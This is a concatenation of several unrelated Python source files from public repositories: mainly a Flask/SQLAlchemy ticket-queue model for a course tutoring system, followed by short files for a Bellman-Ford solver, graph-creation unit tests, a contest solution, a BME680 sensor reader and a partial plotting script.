--> The warning message to show when\\\n high capacity for students.\\n\n defaultTagsEnabled --> If the tag of the queue is enabled. ??? \\n\n ticketCooldown --> Int for the time to wait between two ticket\n submissions.\\n\n @author YixuanZhou\n \"\"\"\n __tablename__ = 'Queue'\n id = db.Column(db.Integer, primary_key=True, nullable=False)\n status = db.Column(db.Integer, nullable=False, default=Status.CLOSED)\n high_capacity_enable = db.Column(db.Boolean, nullable=False, default=True)\n high_capacity_threshold = db.Column(db.Integer, nullable=False,\n default=25)\n high_capacity_message = db.Column(db.Text, nullable=False,\n default='The queue is currently at high \\\n capacity. The tutors will be \\\n limiting their time to 5\\\n minutes per student.')\n high_capacity_warning = db.Column(db.Text, nullable=False,\n default='The queue is currently very busy. \\\n You may not be helped before \\\n tutor hours end.')\n ticket_cool_down = db.Column(db.Integer, nullable=False, default=10)\n queue_lock = db.Column(db.Boolean, nullable=False, default=False)\n\n def __init__(self, **kwargs):\n \"\"\"\n The constructor of the queue object.\\n\n Inputs:\\n\n high_capacity_enabled --> Whether to enable high capacity or not.\n Default is true. \\n\n high_capacity_message --> High capacity message. 
Default is provided.\\n\n high_capacity_warning --> The warning to the student.\n Default is provided.\\n\n ticket_cooldown --> The cooldown time for the ticket.\\n\n \"\"\"\n super(Queue, self).__init__(**kwargs)\n\n def save(self):\n \"\"\"\n Save the object that is modified into the database.\\n\n \"\"\"\n db.session.commit()\n\n def update_ticket(self, student: User, title: str,\n description: str, room: str,\n workstation: str, is_private: bool,\n help_type: HelpType,\n tag_list: List[TicketTag]) -> Ticket:\n \"\"\"\n Update a ticket if it exists, otherwise add one.\\n\n Inputs:\\n\n student --> The student who submits the ticket.\\n\n title --> The title of the ticket.\\n\n description --> The description of the ticket.\\n\n room --> The room this ticket is in.\\n\n workstation --> The workstation the ticket is at.\\n\n help_type --> The type of help needed.\\n\n tag_list --> The list of tags of the ticket.\\n\n Return:\\n\n The updated ticket.\\n\n \"\"\"\n old_ticket = Ticket.find_pending_ticket_by_student(queue=self,\n student=student)\n # update only when a pending ticket exists; otherwise create a new one\n if old_ticket:\n old_ticket.student_update(title=title, description=description,\n room=room, workstation=workstation,\n is_private=is_private,\n help_type=help_type,\n tag_list=tag_list)\n # Create a new Ticket Event\n te = TicketEvent(event_type=EventType.UPDATED,\n ticket_id=old_ticket.id,\n user_id=student.id)\n TicketEvent.add_to_db(te)\n return old_ticket\n else:\n return self.add_ticket(student=student, title=title,\n description=description, room=room,\n workstation=workstation,\n is_private=is_private,\n help_type=help_type, tag_list=tag_list)\n\n # Getter Methods for Queue Status\n def is_open(self) -> bool:\n \"\"\"\n Check if the queue is open.\\n\n Return:\\n\n bool value indicates queue is open or not.\\n\n \"\"\"\n return self.status == Status.OPEN.value\n\n def is_locked(self) -> bool:\n \"\"\"\n Check if the queue is locked.\\n\n Return:\\n\n bool value indicates queue is locked or not.\\n\n \"\"\"\n return self.status == Status.LOCKED.value\n\n def is_closed(self) -> bool:\n \"\"\"\n Check if the queue is closed.\\n\n Return:\\n\n bool value indicates queue is closed or not.\\n\n \"\"\"\n return self.status == Status.CLOSED.value\n\n # Status setter methods\n def open(self) -> None:\n \"\"\"\n Open the queue.\n \"\"\"\n self.status = Status.OPEN.value\n self.save()\n\n def lock(self) -> None:\n \"\"\"\n Lock the queue.\n \"\"\"\n self.status = Status.LOCKED.value\n self.save()\n\n def close(self) -> None:\n \"\"\"\n Close the queue.\n \"\"\"\n self.status = Status.CLOSED.value\n self.save()\n\n def clear_ticket(self) -> None:\n \"\"\"\n Clear all the tickets in the queue.\n \"\"\"\n unresolved_tickets = Ticket.find_all_tickets(self, [t_status.PENDING])\n\n for ticket in unresolved_tickets:\n ticket.mark_canceled()\n\n def __repr__(self) -> str:\n \"\"\"\n The to_string method to return which course this queue belongs to.\\n\n Returns:\\n\n The string representation of the course it belongs to.\\n\n \"\"\"\n course = Course.get_course_by_queue_id(self.id)\n # repr the owning course when it exists\n if course:\n return repr(course)\n else:\n return None\n\n def to_json(self) -> Dict[str, str]:\n '''\n Function that takes a queue object and returns it as a dictionary.\\n\n Params: none\\n\n Returns: Dictionary of the queue info\n '''\n 
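# Illustrative payload (values made up): {'queue_id': 1, 'status': 'OPEN',\n # 'high_capacity_enabled': True, 'high_capacity_message': '...',\n # 'high_capacity_threshold': 25, 'high_capacity_warning': '...',\n # 'ticket_cooldown': 10}\n 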
ret = {}\n ret['queue_id'] = self.id\n ret['status'] = Status(self.status).name\n ret['high_capacity_enabled'] = self.high_capacity_enable\n ret['high_capacity_message'] = self.high_capacity_message\n ret['high_capacity_threshold'] = self.high_capacity_threshold\n ret['high_capacity_warning'] = self.high_capacity_warning\n ret['ticket_cooldown'] = self.ticket_cool_down\n return ret\n\n # Get tickets / ticket-related status\n def get_pending_tickets(self) -> List[Ticket]:\n \"\"\"\n Get all the pending tickets of the queue.\\n\n Results:\\n\n A list of tickets that is pending in this queue.\\n\n \"\"\"\n return Ticket.find_all_tickets(self, status=[t_status.PENDING])\n\n def get_accepted_tickets(self) -> List[Ticket]:\n \"\"\"\n Get all the accepted tickets of the queue.\\n\n Results:\\n\n A list of tickets that is accepted in this queue.\\n\n \"\"\"\n # use the ticket status enum (t_status); the queue's own Status\n # enum has no ACCEPTED member\n return Ticket.find_all_tickets(self, status=[t_status.ACCEPTED])\n\n def get_unresolved_tickets(self) -> List[Ticket]:\n \"\"\"\n Get all the unresolved tickets of the queue.\\n\n Results:\\n\n A list of tickets that is either pending or accepted.\\n\n \"\"\"\n return Ticket.find_all_tickets(self, status=[t_status.PENDING,\n t_status.ACCEPTED])\n\n def get_resolved_tickets(self) -> List[Ticket]:\n \"\"\"\n Get all the resolved tickets of the queue.\\n\n Results:\\n\n A list of tickets that is resolved.\\n\n \"\"\"\n return Ticket.find_all_tickets(self, status=[t_status.RESOLVED])\n\n def get_canceled_tickets(self) -> List[Ticket]:\n \"\"\"\n Get all the canceled tickets of the queue.\\n\n Results:\\n\n A list of tickets that is canceled.\\n\n \"\"\"\n return Ticket.find_all_tickets(self, status=[t_status.CANCELED])\n\n def is_at_high_capacity(self) -> bool:\n \"\"\"\n Check if the queue is at high capacity.\\n\n Return:\\n\n bool value indicates queue is at high capacity or not.\\n\n \"\"\"\n threshold = self.high_capacity_threshold\n return self.high_capacity_enable and\\\n len(self.get_unresolved_tickets()) > threshold\n\n def get_closed_ticktes_history(self, page_num: int = 0,\n num_per_page: int = 10) -> List[Ticket]:\n \"\"\"\n Get a page of the closed-ticket history.\\n\n Inputs:\\n\n page_num --> The page to start looking at, default 0.\\n\n num_per_page --> The number of entries to list per page, default 10.\\n\n Returns:\\n\n List of closed tickets history.\\n\n \"\"\"\n offset = page_num * num_per_page\n return Ticket.find_ticket_history_with_offset(queue=self,\n offset=offset,\n limit=num_per_page)\n\n def get_closed_ticket_history_for(self, student: User, page_num: int = 0,\n num_per_page: int = 10) \\\n -> List[Ticket]:\n \"\"\"\n Get a page of the closed-ticket history for a student.\\n\n Inputs:\\n\n student --> The User object for the student.\\n\n page_num --> The page to start looking at, default 0.\\n\n num_per_page --> The number of entries to list per page, default 10.\\n\n Returns:\\n\n List of closed tickets history for a student.\\n\n \"\"\"\n offset = page_num * num_per_page\n return Ticket.find_ticket_history_with_offset(queue=self,\n offset=offset,\n limit=num_per_page,\n student=student)\n\n def get_pending_ticket_for(self, student: User) -> Optional[Ticket]:\n \"\"\"\n Get a pending ticket for a certain student on this queue.\n (There should only be one pending ticket).\n Inputs:\\n\n student -> The User object for 
the student.\\n Returns:\\n The pending ticket of the student on this queue.\\n \"\"\"\n tickets = Ticket.find_all_tickets_by_student(queue=self, student=student,\n status=[t_status.PENDING])\n # return None rather than raising IndexError when no ticket exists, so\n # the has_*_for helpers below can test the result against None\n return tickets[0] if tickets else None\n\n def get_accepted_ticket_for(self, student: User) -> Optional[Ticket]:\n \"\"\"\n Get an accepted ticket for a certain student on this queue.\n (There should only be one accepted ticket).\n Inputs:\\n\n student -> The User object for the student.\\n\n Returns:\\n\n The accepted ticket of the student on this queue.\\n\n \"\"\"\n tickets = Ticket.\\\n find_all_tickets_by_student(queue=self, student=student,\n status=[t_status.ACCEPTED])\n return tickets[0] if tickets else None\n\n def get_unresolved_ticket_for(self, student: User) -> Optional[Ticket]:\n \"\"\"\n Get an unresolved ticket for a certain student on this queue.\n (There should only be one unresolved ticket).\n Inputs:\\n\n student -> The User object for the student.\\n\n Returns:\\n\n The unresolved ticket of the student on this queue.\\n\n \"\"\"\n tickets = Ticket.find_all_tickets_by_student(queue=self, student=student,\n status=[t_status.ACCEPTED,\n t_status.PENDING])\n return tickets[0] if tickets else None\n\n def get_resolved_ticket_for(self, student: User) -> List[Ticket]:\n \"\"\"\n Get the resolved tickets for a certain student on this queue.\n Inputs:\\n\n student -> The User object for the student.\\n\n Returns:\\n\n A list of tickets of the student on this queue that are resolved.\\n\n \"\"\"\n return Ticket.find_all_tickets_by_student(queue=self, student=student,\n status=[t_status.RESOLVED])\n\n def get_canceled_ticket_for(self, student: User) -> List[Ticket]:\n \"\"\"\n Get the canceled tickets for a certain student on this queue.\n Inputs:\\n\n student -> The User object for the student.\\n\n Returns:\\n\n A list of tickets of the student on this queue that are canceled.\\n\n \"\"\"\n return Ticket.find_all_tickets_by_student(queue=self, student=student,\n status=[t_status.CANCELED])\n\n # Not implementing getLastResolvedTicketFor since it was only used\n # In tickets stats which is already handled.\n\n # Student bool query methods\n def has_pending_tickect_for(self, student: User) -> bool:\n \"\"\"\n Check whether this student has a pending ticket in this queue.\\n\n Inputs:\\n\n student --> The student object to look for.\\n\n Returns:\\n\n A bool value indicating whether there is or is not a pending\n ticket.\\n\n \"\"\"\n return self.get_pending_ticket_for(student) is not None\n\n def has_accepted_tickect_for(self, student: User) -> bool:\n \"\"\"\n Check whether this student has an accepted ticket in this queue.\\n\n Inputs:\\n\n student --> The student object to look for.\\n\n Returns:\\n\n A bool value indicating whether there is or is not an accepted\n ticket.\\n\n \"\"\"\n return self.get_accepted_ticket_for(student) is not None\n\n def has_unresolved_tickect_for(self, student: User) -> bool:\n \"\"\"\n Check whether this student has an unresolved ticket in this queue.\\n\n Inputs:\\n\n student --> The student object to look for.\\n\n Returns:\\n\n A bool value indicating whether there is or is not an unresolved\n ticket.\\n\n \"\"\"\n return self.get_unresolved_ticket_for(student) is not None\n\n # Grader Ticket Query Methods\n def get_ticket_accepted_by(self, grader: User, all: bool = False) \\\n -> List[Ticket]:\n \"\"\"\n Get tickets accepted by a grader, with a choice of how many tickets to\n look for.\\n\n Inputs:\\n\n grader --> The grader to search for.\\n\n all --> Indicates whether all tickets are returned.\\n\n Returns:\\n\n A list of tickets that are accepted by the grader\n (If only one is needed, the ticket will be the first one and\n the only one in the list).\\n\n \"\"\"\n if all:\n return Ticket.find_all_ticket_accpeted_by_grader(self,\n grader=grader)\n else:\n return [Ticket.find_ticket_accpeted_by_grader(self, grader=grader)]\n\n def get_ticket_resolved_by(self, grader: User) -> List[Ticket]:\n \"\"\"\n Get all the tickets resolved by a grader.\n Inputs:\\n\n grader --> The grader to search 
for.\\n Returns:\\n A list of tickets that is resolved by the grader.\\n \"\"\"\n tickets = Ticket.find_all_tickets_for_grader(self, grader)\n return list(filter(lambda x: x.status == t_status.RESOLVED, tickets))\n\n # Grader tickets bool query methods\n def has_ticket_accepted_by(self, grader: User) -> bool:\n return len(self.get_ticket_accepted_by(grader)) != 0\n\n # News feed post functionalities\n def get_news_feed_post(self, num: int = 20) -> List[NewsFeedPost]:\n \"\"\"\n Get the news feed post on the queue.\n Inputs:\\n\n num --> The number of news feed posts to look up for.\n Returns:\\n\n A list of news feed post.\n \"\"\"\n # return nfp.find...\n # Use the npf.find methods for the news_feed_post\n pass\n\n def get_archived_news_feed_post(self, num: int = 20)\\\n -> List[NewsFeedPost]:\n \"\"\"\n Get the archived news feed posts for the queue.\n Inputs:\\n\n num --> The number of news feed posts to look up for.\n Returns:\\n\n A list of archived news feed post.\n \"\"\"\n # return nfp.find...\n # Use the npf.find methods for the news_feed_post\n pass\n\n # Implementing Queue Stats\n def average_help_time(self, day: bool = True, hour: bool = False,\n start: str = None,\n end: str = None) -> timedelta:\n \"\"\"\n Get the average help time within a time period for tickets in\n the queue.\\n\n Inputs:\\n\n day --> To look for a day, default would be true.\\n\n hour --> To look for the recent hour, default would be false.\\n\n start --> The start time to look for. The default would be None.\n If start is provided, it has priority among hour and day.\\n\n end --> The end time to look for. The default would be None.\n end would only work if start is provided.\\n\n Returns:\\n\n A timedelta object representing the average help time for the tickets\n in that period.\\n\n \"\"\"\n # an explicit start takes priority over the day/hour flags (see the\n # docstring above)\n if start:\n day = False\n hour = False\n tickets = Ticket.find_resolved_tickets_in(self, day=day,\n hour=hour,\n start=start, end=end)\n if len(tickets) < 5:\n return timedelta(minutes=5) # MIN_WAIT_TIME ('0:05:00') as a timedelta\n average_resolved_time = Ticket.average_resolved_time(tickets)\n return timedelta(seconds=average_resolved_time)\n\n # getExpectedTimeUntilAvailableTutor need a query method probably in\n # enrolled class...\n def wait_time_for_next_tutor(self) -> timedelta:\n \"\"\"\n Get the expected wait time for the next tutor to be available\n Returns:\\n\n The timedelta object for the expected time for the next tutor to be\n available.\n \"\"\"\n ave_resolve_time = self.average_help_time(hour=True)\n # pending_num = self.get_pending_tickets()\n status, reason, active_tutors \\\n = EnrolledCourse.find_active_tutor_for(self.id)\n active_tutor_num = len(active_tutors)\n # Use enrolled course methods to find the num of active tutor.\n accepted_tickets = self.get_accepted_tickets()\n next_available = timedelta(seconds=0)\n if active_tutor_num > len(accepted_tickets):\n return next_available\n now = TimeUtil.get_current_time()\n # Simplifying the algorithm for now (without using utils)\n for ticket in accepted_tickets:\n current_help_time = now - ticket.accepted_at\n potential_time_need = ave_resolve_time - current_help_time\n next_available = max(next_available, potential_time_need)\n\n return next_available\n\n def get_wait_time(self, student: User) -> Optional[timedelta]:\n \"\"\"\n Get the expected wait time for a student.\\n\n Inputs:\\n\n The student User object.\\n\n Returns:\\n\n The expected wait time for this student's ticket to be accepted.\n If this student has no ticket in the queue, return None.\\n\n \"\"\"\n 
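# Rough example (hypothetical numbers): with 3 tickets ahead, an average\n # help time of ~12 minutes and the next tutor free in ~4 minutes, the\n # computation below gives about 3 * 12 + 4 = 40 minutes.\n 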
student_ticket = self.get_pending_ticket_for(student=student)\n if student_ticket is None:\n return None\n # Get the number of tickets before this student's\n position = student_ticket.get_position()\n wait_time = timedelta(seconds=0)\n next_available = self.wait_time_for_next_tutor()\n ave_help_time = self.average_help_time()\n wait_time = position * ave_help_time + next_available\n\n return wait_time\n\n def get_queue_wait_time(self) -> timedelta:\n \"\"\"\n Given all the tickets in the queue, calculate the expected wait time\n if a ticket is submitted now.\\n\n Return:\\n\n The expected wait time for a ticket that is submitted now.\\n\n \"\"\"\n pending_num = len(self.get_pending_tickets())\n ave_time = self.average_help_time()\n\n return pending_num * ave_time\n\n # Static add method\n @staticmethod\n def add_to_db(queue: Queue):\n \"\"\"\n Add the queue to the database.\\n\n Inputs:\\n\n queue --> the queue object created.\\n\n \"\"\"\n db.session.add(queue)\n db.session.commit()\n\n @staticmethod\n def update_queue_setting(queue_id: int,\n high_capacity_enable: bool,\n high_capacity_threshold: int,\n high_capacity_message: str,\n high_capacity_warning: str,\n ticket_cool_down: int,\n queue_lock: bool = True) -> Queue:\n q = Queue.get_queue_by_id(queue_id=queue_id)\n q.high_capacity_enable = high_capacity_enable\n if high_capacity_threshold:\n q.high_capacity_threshold = high_capacity_threshold\n if high_capacity_message:\n q.high_capacity_message = high_capacity_message\n if high_capacity_warning:\n q.high_capacity_warning = high_capacity_warning\n if ticket_cool_down:\n q.ticket_cool_down = ticket_cool_down\n q.queue_lock = queue_lock\n q.save()\n return q\n\n @staticmethod\n def create_queue(status: Status,\n high_capacity_enable: bool,\n high_capacity_threshold: int,\n high_capacity_message: str,\n high_capacity_warning: str,\n ticket_cool_down: int,\n queue_lock: bool = True):\n \"\"\"\n Create a new queue in the database.\\n\n \"\"\"\n status = status.value\n queue = Queue(status=status,\n high_capacity_enable=high_capacity_enable,\n high_capacity_threshold=high_capacity_threshold,\n high_capacity_message=high_capacity_message,\n high_capacity_warning=high_capacity_warning,\n ticket_cool_down=ticket_cool_down,\n queue_lock=queue_lock)\n Queue.add_to_db(queue)\n return queue\n\n @staticmethod\n def get_queue_by_id(queue_id: int) -> Optional[Queue]:\n \"\"\"\n Find the queue by the queue_id.\\n\n Inputs:\\n\n queue_id --> The id of the queue to look for.\\n\n Returns:\\n\n The queue object, return None if it is not in the database.\\n\n \"\"\"\n return Queue.query.filter_by(id=queue_id).first()\n\n # Non-member Queue Methods\n @staticmethod\n def grader_login(queue_id: int, grader_id: int,\n action_type: ActionType =\n ActionType.MANUAL.value) -> (bool, str):\n \"\"\"\n Login a grader when the grader logs in to the queue.\\n\n Inputs:\\n\n queue --> The queue that the grader is logging in.\\n\n grader --> The grader that is logging in.\\n\n action_type --> The type of action for logging in, default MANUAL.\\n\n Return:\\n\n True or false indicates whether the function is successful.\n \"\"\"\n queue = Queue.get_queue_by_id(queue_id)\n if not queue:\n return False, 'Queue Not Found'\n course = Course.get_course_by_queue_id(queue_id)\n if not course:\n return False, 'Course Not Found'\n grader = EnrolledCourse.find_user_in_course(user_id=grader_id,\n course_id=course.id)\n if not grader:\n return False, 'User Not Found'\n grader.change_status(EStatus.ACTIVE)\n event = 
QueueLoginEvent.create_login_event(event_type=EType.LOGIN,\n action_type=action_type,\n grader_id=grader_id,\n queue_id=queue_id)\n queue.open()\n return True, 'Success'\n\n @staticmethod\n def grader_logout(queue_id: int, grader_id: int,\n action_type: ActionType =\n ActionType.MANUAL.value) -> (bool, str):\n \"\"\"\n Logout a grader when the grader logs out from the queue.\\n\n Inputs:\\n\n queue --> The queue that the grader is logging out.\\n\n grader --> The grader that is logging out.\\n\n action_type --> The type of action for logging out.\\n\n Return:\\n\n True or false indicates whether the function runs successfully.\n A string that tells what is the status.\n \"\"\"\n queue = Queue.get_queue_by_id(queue_id)\n if not queue:\n return False, 'Queue Not Found'\n course = Course.get_course_by_queue_id(queue_id)\n if not course:\n return False, 'Course Not Found'\n grader = EnrolledCourse.find_user_in_course(user_id=grader_id,\n course_id=course.id)\n if not grader:\n return False, 'User Not Found'\n grader.change_status(EStatus.INACTIVE)\n event = QueueLoginEvent.create_login_event(event_type=EType.LOGOUT,\n action_type=action_type,\n grader_id=grader.id,\n queue_id=queue.id\n )\n s, r, graders = EnrolledCourse.find_active_tutor_for(queue.id)\n if len(graders) == 0:\n queue.lock()\n return True, 'Success'\n\n @staticmethod\n def accept_ticket(queue_id: int, ticket_id: int,\n grader_id: int) -> (bool, str):\n \"\"\"\n Accept a ticket.\\n\n Inputs:\\n\n queue_id --> The id of the queue that we are in.\\n\n ticket_id --> The id of the ticket to be accepted.\\n\n grader_id --> The id of the grader to accept the ticket.\\n\n Return:\\n\n Whether the operation succeeded or not.\n \"\"\"\n # get_course_by_queue_id returns a Course object; its id is needed here\n course_id = Course.get_course_by_queue_id(queue_id=queue_id).id\n e_grader = EnrolledCourse.find_user_in_course(user_id=grader_id,\n course_id=course_id)\n if e_grader.get_role() not in [ERole.INSTRUCTOR, ERole.GRADER]:\n return (False, \"You can't take the ticket\")\n if e_grader.get_status() != EStatus.ACTIVE:\n return (False, 'The user is currently busy')\n t = Ticket.get_ticket_by_id(ticket_id)\n t.mark_accepted_by(e_grader.id)\n e_grader.change_status(EStatus.BUSY)\n return (True, 'Ticket Accepted')\n\n @staticmethod\n def resolve_ticket(queue_id: int, ticket_id: int,\n grader_id: int) -> (bool, str):\n \"\"\"\n Resolve a ticket.\\n\n Inputs:\\n\n queue_id --> The id of the queue that we are in.\\n\n ticket_id --> The id of the ticket to be accepted.\\n\n grader_id --> The id of the grader to accept the ticket.\\n\n Return:\\n\n Whether the operation succeeded or not.\n \"\"\"\n course_id = Course.get_course_by_queue_id(queue_id=queue_id).id\n e_grader = EnrolledCourse.find_user_in_course(user_id=grader_id,\n course_id=course_id)\n if e_grader.get_role() not in [ERole.INSTRUCTOR, ERole.GRADER]:\n return (False, \"You can't resolve the ticket\")\n t = Ticket.get_ticket_by_id(ticket_id)\n # calling the accessor (assumed to be a method, like the other\n # Ticket/EnrolledCourse accessors used above)\n accepter = EnrolledCourse.find_user_in_course(user_id=t.get_grader_id(),\n course_id=course_id)\n t.mark_resolved()\n accepter.change_status(EStatus.ACTIVE)\n return (True, 'Ticket Resolved')\n\n 
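# Typical lifecycle, for orientation: grader_login marks the grader ACTIVE\n # and opens the queue; accept_ticket flips the accepting grader to BUSY;\n # resolve_ticket closes the ticket and frees the grader again.\n\n 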
@staticmethod\n def find_current_queue_for_user(user_id: int) -> (bool, str, List[Queue]):\n \"\"\"\n Find all the queues that this user is in currently.\n Inputs:\\n\n user --> The User object to look for.\n Returns:\\n\n bool --> indicates whether it succeeded or not.\n str --> the message\n A list of Queue that the user is in this quarter.\n \"\"\"\n ec_list = EnrolledCourse.find_courses_user_in(user_id=user_id)\n if not ec_list:\n return (False, \"User not found in any course\", None)\n q_id_list = []\n for ec in ec_list:\n # look up the queue id for the course (the same accessor that\n # find_queue_for_course below uses); a course id is not a queue id\n q = Course.get_queue_id_by_id(ec.course_id)\n q_id_list.append(q)\n q_list = []\n for q_id in q_id_list:\n q = Queue.query.filter_by(id=q_id).first()\n q_list.append(q)\n return (True, \"Success\", q_list)\n\n @staticmethod\n def find_queue_for_course(course_id: int) -> (bool, Optional[Queue]):\n \"\"\"\n Find the queue corresponding to a course.\n Inputs:\\n\n course --> the Course object to look for.\n Returns:\\n\n The queue for that course; if a queue does not exist, None is returned.\\n\n \"\"\"\n q_id = Course.get_queue_id_by_id(course_id)\n q = Queue.query.filter_by(id=q_id).first()\n if q:\n return True, q\n else:\n return False, q\n\n @staticmethod\n def get_all_feedback_for_queue(queue_id: int) -> List[TicketFeedback]:\n \"\"\"\n Get a list of ticket feedback for the queue.\\n\n Input:\\n\n queue_id --> The id of the queue\n Returns:\\n\n A list of ticket feedback.\n \"\"\"\n return Ticket.find_all_feedback_for_queue(queue_id)\n\n @staticmethod\n def get_feedback_for_grader(queue_id: int,\n grader_id: int) -> List[TicketFeedback]:\n \"\"\"\n Get a list of ticket feedbacks for the grader.\\n\n Inputs:\\n\n queue_id --> The id of the queue\n grader_id --> The id of the grader.\n Returns:\\n\n A list of ticket feedbacks\n \"\"\"\n return Ticket.find_feedback_for_grader(queue_id=queue_id,\n grader_id=grader_id)\n\n @staticmethod\n def get_feedback_for_student(queue_id: int,\n student_id: int) -> List[TicketFeedback]:\n \"\"\"\n Get a list of ticket feedbacks for the student.\\n\n Inputs:\\n\n queue_id --> The id of the queue\n student_id --> The id of the student.\n Returns:\\n\n A list of ticket feedbacks\n \"\"\"\n # assuming Ticket exposes a student-side lookup mirroring\n # find_feedback_for_grader, which does not take a student_id\n return Ticket.find_feedback_for_student(queue_id=queue_id,\n student_id=student_id)\n","repo_name":"trulyronak/chessboard","sub_path":"project/src/models/queue.py","file_name":"queue.py","file_ext":"py","file_size_in_byte":31964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"30329622488","text":"def bellman_ford(G, V, r):\n # relax all edges V times; a relaxation that still succeeds on the final\n # (V-th) pass means a negative cycle is reachable from the source r\n dist = [float(\"inf\") for _ in range(V)]\n dist[r] = 0\n\n for i in range(V):\n for s, t, d in G:\n if dist[t] > dist[s] + d:\n dist[t] = dist[s] + d\n if i == V - 1:\n print(\"NEGATIVE CYCLE\")\n return\n\n for i in range(V):\n print(\"INF\" if dist[i] == float(\"inf\") else dist[i])\n\n\nV, E, r = map(int, input().split())\nG = []\nfor i in range(E):\n s, t, d = map(int, input().split())\n G.append((s, t, d))\n\nbellman_ford(G, V, r)\n","repo_name":"aiutarsi/Grad-Thesis-Investigation","sub_path":"codes/ans15.py","file_name":"ans15.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"70507573332","text":"import unittest\nfrom Tests.testsUtils import *\n\n\nclass TestGraphCreation(unittest.TestCase):\n\n def test_graph_creation(self):\n for i in range(0, 5):\n directed, nodes, edges = generate_random_params()\n graph = Graph(directed, nodes, edges)\n self.assertEqual(directed, graph.directed)\n self.assertEqual(edges, graph._edges_list)\n self.assertEqual(nodes, graph._nodes_list)\n\n def test_graph_creation_by_strings(self):\n for i in range(0, 5):\n directed, nodes_str, edges_str = generate_random_params_strings()\n graph = Graph.create_graph_from_strings(directed,\n nodes_str,\n edges_str)\n nodes = []\n edges = []\n 
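# Expected string formats (per the test utils' generators, presumably):\n # nodes_str like \"1 2 3\"; edges_str like \"1,2 2,3\" (space-separated\n # \"in,out\" pairs).\n for node in nodes_str.split():\n nodes.append(Node(int(node)))\n for pair in edges_str.split():\n pair 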
= pair.split(\",\")\n                edges.append(Edge(Node(int(pair[0])),\n                                  Node(int(pair[1]))))\n            self.assertEqual(directed, graph.directed)\n            self.assertEqual(nodes, graph._nodes_list)\n            self.assertEqual(edges, graph._edges_list)\n\n\n    def test_ununiq_nodes_ids(self):\n        nodes_ununiq_ids = [Node(randint(1,100)), Node(randint(1,100))]\n        nodes_ununiq_ids.append(nodes_ununiq_ids[randint(0,1)])\n        edges = [Edge(nodes_ununiq_ids[0],\n                      nodes_ununiq_ids[1])]\n        try:\n            graph = Graph(False, nodes_ununiq_ids,\n                          edges)\n            assert False\n        except GraphCreationException as exception:\n            self.assertEqual(type(exception) == GraphCreationException, True)\n\n    def test_edge_creation(self):\n        try:\n            params = (Node(1), \"\")\n            edge = Edge(node_in=params[0], node_out=params[1])\n            assert False\n        except EdgeCreationException as exception:\n            self.assertEqual(type(exception) == EdgeCreationException, True)\n        try:\n            params = (None, Node(1))\n            edge = Edge(params[0], params[1])\n            assert False\n        except EdgeCreationException as exception:\n            self.assertEqual(type(exception) == EdgeCreationException, True)\n\n\n\n\nif __name__ == '__main__':\n    unittest.main()\n","repo_name":"mMatvey/graphs-framework","sub_path":"Tests/testGraphCreation.py","file_name":"testGraphCreation.py","file_ext":"py","file_size_in_byte":2382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"1670645012","text":"from machine import SPI, Pin\nfrom bme680 import BME680_SPI\n\ndef get_bme680_data():\n    bme680_data = {\n        'temperature': None,\n        'humidity': None,\n        'pressure': None,\n        'gas': None,\n        'altitude': None,\n    }\n\n    # Configuration #1: see breadboard.py\n    #spi = SPI(0, mode=SPI.MASTER, baudrate=2000000, polarity=0, phase=0, pins=('P4','P20','P19'))\n    # Configuration #2: see breadboard.py\n    spi = SPI(0, mode=SPI.MASTER, baudrate=2000000, polarity=0, phase=0, pins=('P20','P19','P18'))\n    cs = Pin('P3', Pin.OUT, value=1)\n    bme = BME680_SPI(spi, cs)\n\n    bme.sea_level_pressure = 1013.25\n    temperature_offset = -5\n\n    bme680_data['temperature'] = '{}'.format(bme.temperature)\n    bme680_data['humidity'] = '{}'.format(bme.humidity)\n    bme680_data['pressure'] = '{}'.format(bme.pressure)\n    bme680_data['gas'] = '{}'.format(bme.gas)\n    bme680_data['altitude'] = '{}'.format(bme.altitude)\n\n    return bme680_data\n\n# vim: ai et ts=4 sts=4 sw=4 nu\n","repo_name":"johnedstone/pycom-gpy","sub_path":"projects/post_json_data/lib/helper_bme680.py","file_name":"helper_bme680.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"41962194071","text":"# https://atcoder.jp/contests/agc009/submissions/42066508\n\nn = int(input())\na = []\nb = []\nfor _ in range(n):\n    x, y = map(int, input().split())\n    a.append(x)\n    b.append(y)\n\nans = 0\nwhile len(a) > 0: ans += (b[-1] - (a.pop() + ans) % b[-1]) % b.pop()\nprint(ans)\n","repo_name":"tawainfer/atcoder-submission","sub_path":"agc/agc009/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"40761544782","text":"# -*- coding: utf-8 -*-\n# @Time : 2022/10/25 12:27 PM\n# @Author : weather\n# @Software: PyCharm\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport pandas as pd\nimport glob\nimport os\nimport numpy as np\nimport random\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import confusion_matrix\nfrom PIL import 
Image\nplt.rcParams['font.family'] = 'Times New Roman'\n\n\ndef data_statistics_bar_plot():\n    def get_data(root_dir):\n        image_number = {}\n        for fn in os.listdir(root_dir):\n            search = os.path.join(root_dir, fn, '*')\n            images = glob.glob(search)\n            image_number[fn] = len(images)\n        df = pd.DataFrame.from_dict({'diseases': image_number.keys(),\n                                     'image_number': image_number.values()})\n        return df\n\n    def field_lab_df(field_folder, lab_folder):\n        field_df = get_data(field_folder)\n        field_df.columns = ['diseases', 'Field']\n        lab_df = get_data(lab_folder)\n        lab_df.columns = ['diseases', 'Lab']\n        res = pd.merge(field_df, lab_df)\n        return res\n\n    field_folder = '../data/original_datasets/merged_datasets/field/'\n    lab_folder = '../data/original_datasets/merged_datasets/lab/'\n    res = field_lab_df(field_folder, lab_folder)\n    res = res.sort_values(by='diseases')\n    ax = res.plot(kind='bar', stacked=True,\n                  color=['Tab:red', 'Tab:blue'])\n    xlabel = res.diseases.str.replace('_', ' ')\n    ax.set_xticklabels(xlabel)\n    ax.bar_label(ax.containers[0],\n                 label_type='center', fontsize=8)\n    ax.bar_label(ax.containers[1],\n                 label_type='center', fontsize=8)\n    plt.legend(fontsize=10, frameon=True)\n    plt.xlabel('Diseases 